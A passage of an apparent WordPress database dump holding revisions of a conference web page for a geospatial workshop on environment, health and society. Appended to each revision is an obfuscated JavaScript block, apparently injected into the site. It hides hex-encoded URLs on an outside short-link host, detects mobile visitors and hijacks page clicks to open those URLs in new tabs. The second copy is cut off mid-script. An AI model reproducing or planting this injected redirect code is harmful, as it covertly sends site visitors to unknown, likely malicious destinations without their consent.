emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<p>&nbsp;</p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li>Weilian Li<strong>, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:17:04','2022-12-07 04:17:04','',3427,'https://gsw2023.com/?p=3444',0,'revision','',0),
(3445,1,'2022-12-07 04:18:48','2022-12-07 04:18:48','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<p><strong>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes.</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li>Weilian Li<strong>, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 